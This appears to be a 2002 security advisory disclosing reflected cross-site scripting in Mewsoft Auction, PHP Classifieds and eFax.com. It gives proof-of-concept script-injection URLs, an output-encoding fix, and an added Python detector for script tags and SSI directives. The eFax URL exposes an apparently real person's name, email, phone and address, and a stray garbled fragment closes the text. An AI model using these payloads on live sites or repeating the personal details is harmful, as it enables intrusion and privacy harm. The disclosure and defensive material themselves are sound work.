Advisory name: SSI & CSS execution in Mewsoft Auction, PHP Classifieds and eFax.com
Application: Mewsoft Auction (Perl script), PHP Classifieds (PHP), eFax.com (ASP)
Date: 14.6.2002
Impact: remote user can execute shell commands (via SSI) & cross site scripting (CSS)

=====================================
CrossSiteScripting @ Mewsoft Auction Script

<example>
http://www.xxxx.com/cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('OopS');</script>&Where=&Sort=Photo&Dir=
</example>

Program Name : Mewsoft Auction
Program Version : 3.0
Home Page : http://www.mewsoft.com

=====================================
CrossSiteScripting @ PHP Classifieds

<example>
http://www.xxxx.com/phpclassifieds/latestwap.php?url=<script>alert('OopS');</script>
</example>

Program Name : PHP Classifieds
Program Version : 6.05
Home Page : http://www.deltascripts.com/phpclassifieds

=====================================
CrossSiteScripting @ eFax.com

<example>
https://www.efax.com/signup/plus/invalid_cc.asp?FirstName=Nadeem&LastName=ali&OpSys=Win2000&Email=ra3e%5Fe7sas%40hotmail%2Ecom&PIN=9999&referralcode=&service=OR%2DPortland%2D503%2DP&VID=5&BID=427%2D2379%2D3151&HomePhone=5302723558&OFFERCODE=EFAX%5FPLUS&orderNumber=43423716&CreditCardType=MC&CreditCardNumber=:)&expmonth=03&expyear=2003&StreetAddress=10621+Cedar+Ave&StreetAddress2=&City=Grass+Valley&MailRegion=CA&PostalCode=95945&Country=United+States&LogoCode=&reorder_amount=&BillingFreq=Anually&startpage=1&agreed=yes&USCities=OR%2DPortland%2D503%2DP&EurCities=NONE&AsiaCities=NONE&LatCities=NONE&CCNumberError=<script>alert('OopS');</script>
</example>

The eFax web site has many CSS issues; that was just one example.

Solution: DON'T trust the user, filter everything. Example in PHP:

<?php
// Encode <, >, &, " and ' as entities before echoing user input back into the page
$input = isset($_GET['input']) ? $_GET['input'] : '';
$input = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
echo "<hr>your input was:<b>$input</b>";
?>

For your information: CSS can SOMETIMES be used to execute shell commands on the web server (using SSI, depending on the web server configuration), not only for cookie hijacking...
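The solution above turned into a check, written here as an added example (not the advisory's code nor any of the vendors'): request lines modelled on the three example URLs are parsed, parameters whose decoded value carries a script tag or an SSI directive opener are flagged, and the htmlspecialchars-equivalent encoding is shown to neutralise both. The access-log style request lines, the SSI echo sample and the benign search are constructed; only the parameter names (Terms, url, CCNumberError) come from the advisory.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed request lines (access-log style) modelled on the advisory's
# three examples plus one benign search; not real captured traffic.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/auction/auction.cgi?action=Sort_Page&Terms=%3Cscript%3Ealert('OopS')%3B%3C/script%3E&Sort=Photo HTTP/1.0",
    "GET /phpclassifieds/latestwap.php?url=%3Cscript%3Ealert('OopS')%3B%3C/script%3E HTTP/1.0",
    "GET /signup/plus/invalid_cc.asp?CCNumberError=%3C!--%23echo%20var=%22DATE_LOCAL%22--%3E HTTP/1.0",
    "GET /cgi-bin/auction/auction.cgi?action=Sort_Page&Terms=laptop&Sort=Photo HTTP/1.0",
]

# Two things an unencoded reflection can carry: markup the browser executes,
# and an SSI directive the server may expand if the page is SSI-parsed.
PATTERNS = {
    "script-tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    "ssi-directive": re.compile(r"<!--\s*#"),
}

def query_params(request_line):
    """Return the decoded query parameters of a 'GET <url> HTTP/x' line."""
    target = request_line.split(" ")[1]
    return dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))

def suspicious_params(request_line):
    """List (parameter, reason) pairs whose decoded value carries a payload."""
    hits = []
    for name, value in query_params(request_line).items():
        for reason, pattern in PATTERNS.items():
            if pattern.search(value):
                hits.append((name, reason))
    return hits

def encode_for_html(value):
    """Equivalent of PHP htmlspecialchars($v, ENT_QUOTES): encodes < > & " '."""
    return html.escape(value, quote=True)

def is_neutralised(value):
    """True when the encoded form no longer matches any pattern above."""
    encoded = encode_for_html(value)
    return not any(p.search(encoded) for p in PATTERNS.values())

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(suspicious_params(line) or "clean", "|", line.split(" ")[1][:60])
```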
§ o m e 1 http://127.0.0.1/